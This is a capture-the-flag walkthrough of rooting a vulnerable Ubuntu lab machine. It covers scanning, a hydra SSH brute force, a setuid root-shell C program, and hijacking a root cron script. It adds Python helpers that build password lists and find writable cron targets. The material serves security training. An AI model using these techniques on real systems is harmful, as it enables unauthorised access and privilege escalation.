**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.**
Welcome to the Ubuntu Challenge: an entertaining, hands-on exercise that tests your system hacking skills. The objective is to gain a root shell on a vulnerable Ubuntu machine and track down a file named proof.txt. Doing so requires standard ethical hacking techniques: discovering weaknesses in the system, exploiting them, and moving through the system in a methodical way.
The challenge provides an opportunity to practice hacking methodologies in a controlled environment and emphasizes the importance of understanding system security and defensive mechanisms. Remember to follow ethical guidelines while tackling this challenge, as the goal is to learn and improve your skills responsibly.
Step 1: $ arp-scan 192.168.64.0/24
Arp-scan: arp-scan is a network discovery tool that uses ARP (Address Resolution Protocol) to identify devices on the local network. It sends an ARP request for every address in the given range and listens for replies, mapping the live hosts and their MAC addresses. It needs raw socket access, so it is normally run as root, and because ARP does not cross routers it only finds hosts on the same layer-2 segment as the scanning machine. The target for the rest of this write-up is 192.168.64.148.
Step 2: $ nmap -v -n -Pn -sV -sC -p- 192.168.64.148
Nmap: Network Mapper is an open-source scanner that finds open ports and identifies the services behind them; its default NSE scripts also pull out banners and some well-known misconfigurations, although it is not a full vulnerability scanner.
-v – verbose output
-n – skip DNS resolution
-Pn – skip host discovery and treat the target as up (useful when ICMP is blocked)
-sV – probe each open port to identify the service and its version
-sC – run the default NSE script set
-p- – scan all 65535 TCP ports instead of the default top 1000
The scan shows three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).
Step 3: Open http://192.168.64.148 in a browser.
Let's also look at the robots.txt file; the only entry it gives us is /secret.
Step 4: Browsing to /secret, we found nothing useful.
Step 5: $ ftp 192.168.64.148
Log in to the FTP service; it holds one interesting file, lol.pcap. Download it:
$ get lol.pcap
Step 6: Open the capture in Wireshark.
Wireshark: Wireshark is a network protocol analyzer, the standard tool for inspecting packet captures.
$ wireshark lol.pcap
Step 7: Look at packet no. 40. Its payload contains a string that reads like a directory name:
sup3rs3cr3tdirlol
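Step 7 finds the hint by reading one packet in Wireshark. The script below is an added example, not code from the original write-up: a minimal parser for the classic pcap container that lists every run of 8 or more printable ASCII bytes in each record together with its packet number, so a hint of this kind can be located from the command line or from a script. The capture bytes it builds are constructed for the example (three fake frames with zeroed headers; the hint sits in packet 3 rather than 40), and the newer pcapng format is deliberately not handled.

```python
import re
import struct
from typing import Iterator, List, Tuple

# Magic numbers of the classic pcap format, microsecond and nanosecond variants.
_LITTLE_ENDIAN = {0xA1B2C3D4, 0xA1B23C4D}
_BIG_ENDIAN = {0xD4C3B2A1, 0x4D3CB2A1}


def iter_pcap_packets(data: bytes) -> Iterator[Tuple[int, bytes]]:
    """Yield (packet_number, frame_bytes) for each record in a pcap file.

    Numbers start at 1 so they match the 'No.' column in Wireshark. Only the
    classic pcap container is handled, not pcapng.
    """
    if len(data) < 24:
        raise ValueError("too short to be a pcap file")
    magic = struct.unpack_from("<I", data, 0)[0]
    if magic in _LITTLE_ENDIAN:
        endian = "<"
    elif magic in _BIG_ENDIAN:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not supported here)")
    offset = 24  # global header: magic, version, tz, sigfigs, snaplen, linktype
    number = 0
    while offset + 16 <= len(data):
        _sec, _frac, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, offset)
        offset += 16
        frame = data[offset:offset + incl_len]
        if len(frame) != incl_len:
            raise ValueError(f"truncated record at packet {number + 1}")
        offset += incl_len
        number += 1
        yield number, frame


def find_strings(data: bytes, min_len: int = 8) -> List[Tuple[int, str]]:
    """(packet_number, text) for every run of min_len+ printable ASCII bytes.

    Scans the raw frame bytes the way 'strings' does, but keeps the packet
    number so the hit can be opened directly in Wireshark.
    """
    printable = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    hits = []
    for number, frame in iter_pcap_packets(data):
        for match in printable.finditer(frame):
            hits.append((number, match.group().decode("ascii")))
    return hits


def build_sample_pcap() -> bytes:
    """Constructed three-record capture for this example (not lol.pcap).

    Each record is 54 zero bytes standing in for Ethernet/IP/TCP headers,
    followed by a made-up TCP payload.
    """
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    payloads = [
        b"\x00" * 54 + b"220 FTP service ready\r\n",
        b"\x00" * 54 + b"\x10\x20\x30",  # binary only, no string of useful length
        b"\x00" * 54 + b"constructed payload naming sup3rs3cr3tdirlol\r\n",
    ]
    records = b"".join(
        struct.pack("<IIII", 1_700_000_000 + i, 0, len(p), len(p)) + p
        for i, p in enumerate(payloads)
    )
    return header + records


if __name__ == "__main__":
    for number, text in find_strings(build_sample_pcap()):
        print(f"packet {number}: {text}")
```

To run it against a real capture, read the file into bytes and pass them to find_strings; lowering min_len finds shorter tokens at the cost of more noise.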
Step 8: Browse to that directory on the web server, http://192.168.64.148/sup3rs3cr3tdirlol, to see what it holds.
Step 9: The directory contains a file named roflmao; download it.
Step 10: Make the file executable and run it. Checking an unknown binary with file and strings before running it is good practice, and it should only ever be run inside the lab VM.
$ chmod +x roflmao
$ ./roflmao
Step 11: The program's output tells us to find the address 0x0856BF. That is not a memory address here but another directory on the web server, so open http://192.168.64.148/0x0856BF in a browser.
That did not directly give us a password, so we go back over our reconnaissance to see what we missed. The 0x0856BF listing contains a folder called this_folder_contains_the_password, which suggests that anything inside it, the file names included, could be the password. We therefore collect every word of at least four characters from that folder, build a new password list from them, and attack again.
Step 12: The second attack yields a valid username and password:
$ hydra -L user.txt -P passwd.txt 192.168.64.148 ssh
Login: ubuntu   Password: Pass.txt
(hydra itself warns that SSH servers often limit concurrent connections and recommends -t 4 for the ssh module.) The password is literally the name of the file inside that folder, which is why file names belong in the list. With these credentials we can log in over SSH.
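The list-building step from Steps 11 and 12, as an added example rather than code from the original write-up. candidate_words takes file names and file contents and returns a deduplicated list that keeps each whole file name verbatim as well as every run of four or more letters/digits, which is exactly what catches Pass.txt; wordlist_from_dir applies it to a local directory, which assumes the folder's files have already been downloaded (the write-up does not show that step), and write_wordlist saves the result in the one-per-line format hydra's -P option reads. The sample names and contents used in the main block are constructed.

```python
import os
import re
from typing import Iterable, List


def candidate_words(names: Iterable[str], contents: Iterable[str],
                    min_len: int = 4) -> List[str]:
    """Build a deduplicated, sorted password list.

    Every file name is kept verbatim (so 'Pass.txt' survives with its dot and
    extension), and every run of min_len+ letters/digits found in the names
    or in the file contents is added as well.
    """
    token = re.compile(r"[A-Za-z0-9]{%d,}" % min_len)
    words = set()
    for name in names:
        words.add(name)
        words.update(token.findall(name))
    for text in contents:
        words.update(token.findall(text))
    return sorted(words)


def wordlist_from_dir(path: str, min_len: int = 4) -> List[str]:
    """Apply candidate_words to a directory that has been fetched locally."""
    names = sorted(os.listdir(path))
    contents = []
    for name in names:
        full = os.path.join(path, name)
        if os.path.isfile(full):
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                contents.append(fh.read())
    return candidate_words(names, contents, min_len)


def write_wordlist(words: Iterable[str], out_path: str) -> None:
    """One candidate per line, the format hydra's -P option expects."""
    with open(out_path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")


if __name__ == "__main__":
    # Constructed sample standing in for the downloaded folder contents.
    sample = candidate_words(["Pass.txt"], ["Just filler text, nothing to see here."])
    print(sample)
```

Running wordlist_from_dir on the downloaded folder and passing the output file to hydra with -P reproduces the attack in Step 12; the same function works for any directory listing whose names or contents might double as credentials.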
Step 13: $ ssh ubuntu@192.168.64.148
Step 14: Next we look for a file that every user can write to and execute.
$ find / -type f -perm 0777 2>/dev/null
Note that -perm 0777 matches only files whose mode is exactly rwxrwxrwx; -perm -o=w would list every world-writable file, which is the broader question to ask during privilege escalation.
Step 15: The search turns up /lib/log/cleaner.py. Open it with nano.
$ nano /lib/log/cleaner.py
Step 16: The script wipes /tmp with os.system('rm -r /tmp/* '). Remove that line first; otherwise the exploit we are about to place in /tmp would be deleted on the job's next run.
Step 17: /$ cd /tmp
/tmp$ nano test.c
Step 18: Add a small program that spawns a shell. It calls setuid(0) and setgid(0) first: bash drops an effective uid that differs from the real uid unless it is started with -p, so without those calls a setuid binary would hand back a shell as ubuntu rather than root.

```c
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* make both the real and effective ids root so bash keeps the privilege */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
```

Step 19: Compile test.c into a binary named exploit.
/tmp$ gcc test.c -o exploit
Step 20: Open /lib/log/cleaner.py again.
$ nano /lib/log/cleaner.py
Step 21: cleaner.py is run by a cron job as root, so whatever we put in it runs as root. We add two lines that hand ownership of the exploit to root and then set the setuid bit together with execute permission for everyone. The order matters: on Linux, chown clears an existing setuid bit, so chmod has to come after it.

```python
os.system('chown root:root /tmp/exploit')
os.system('chmod 4777 /tmp/exploit')
```

Mode 4755 would be enough; 4777 additionally leaves the binary world-writable, so anyone on the box could replace a root-owned setuid binary with their own code.
Step 22: Right after saving cleaner.py, ls -l still shows /tmp/exploit owned by the ubuntu user (group overflow); the cron job has not fired yet.
Step 23: The system logs us out after a while. Log in again and the owner of /tmp/exploit is now root, group root, with the setuid bit set.
Step 24: As the ubuntu user we are allowed to execute it, and running /tmp/exploit drops us into a root shell.
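Steps 14 and 21 together are a general technique: find a script that a root cron job executes and that a low-privileged user can write. The following is an added example (not code from the original write-up) that parses crontab text, in either the /etc/crontab and /etc/cron.d layout with a user column or the user-crontab layout printed by crontab -l, pulls out every absolute path in each command, and reports the ones the current user can write. SAMPLE_CRONTAB is constructed for the example, and the writability check is injectable so the sample can be evaluated without those files existing.

```python
import glob
import os
import shlex
from typing import Callable, List, Tuple

# Constructed sample in the /etc/crontab layout (user column present); the
# target's real crontab is not reproduced in the write-up.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
*/2 * * * * root python /lib/log/cleaner.py
*/5 * * * * root /usr/bin/python /opt/lmao.py
0   3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
@reboot     root /usr/local/bin/startup.sh
"""


def cron_commands(crontab_text: str, has_user_field: bool) -> List[str]:
    """Return the command part of every job line in crontab_text.

    has_user_field=True for /etc/crontab and /etc/cron.d/* (five time fields
    or an @keyword, then a user column, then the command); False for the
    output of 'crontab -l', which has no user column.
    """
    commands = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:  # environment assignment such as SHELL=/bin/sh
            continue
        time_fields = 1 if first.startswith("@") else 5
        skip = time_fields + (1 if has_user_field else 0)
        parts = line.split(None, skip)
        if len(parts) <= skip:  # malformed line or empty command; ignore
            continue
        commands.append(parts[-1])
    return commands


def script_paths(command: str) -> List[str]:
    """Absolute paths referenced by a cron command: interpreter, script and
    any path-like argument. shlex respects quoting; fall back to a plain
    split when the command is not valid shell."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def writable_cron_targets(
    crontab_text: str,
    has_user_field: bool,
    is_writable: Callable[[str], bool] = lambda p: os.access(p, os.W_OK),
) -> List[Tuple[str, str]]:
    """(command, path) pairs for every path in a job that is_writable accepts.
    A writable script executed by root is exactly the cleaner.py situation."""
    hits = []
    for cmd in cron_commands(crontab_text, has_user_field):
        for path in script_paths(cmd):
            if is_writable(path):
                hits.append((cmd, path))
    return hits


if __name__ == "__main__":
    # Constructed sample: pretend only cleaner.py is writable by us.
    print(writable_cron_targets(SAMPLE_CRONTAB, True,
                                is_writable=lambda p: p == "/lib/log/cleaner.py"))
    # Real system files, when present and readable on the machine we run on.
    for path in ["/etc/crontab"] + glob.glob("/etc/cron.d/*"):
        try:
            with open(path) as fh:
                text = fh.read()
        except OSError:
            continue
        for cmd, target in writable_cron_targets(text, True):
            print(f"{path}: job '{cmd}' runs writable {target}")
```

Interpreter paths are reported as well as scripts, since a writable interpreter is just as useful; commands that name a script without a leading slash (relying on PATH) are not caught by this check and need a look at the PATH line instead.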
Step 25: Even as root we keep getting logged out, so a second cron job is still running. List the jobs:
$ crontab -l
Step 26: The listing points at /opt/lmao.py. Open it:
$ nano /opt/lmao.py
Step 27: Remove the code that kills our session.
Step 28: Finally, in /root we find the flag file, proof.txt.
Congratulations!!!!!!!!!!!!!!!!!!!!!!!!!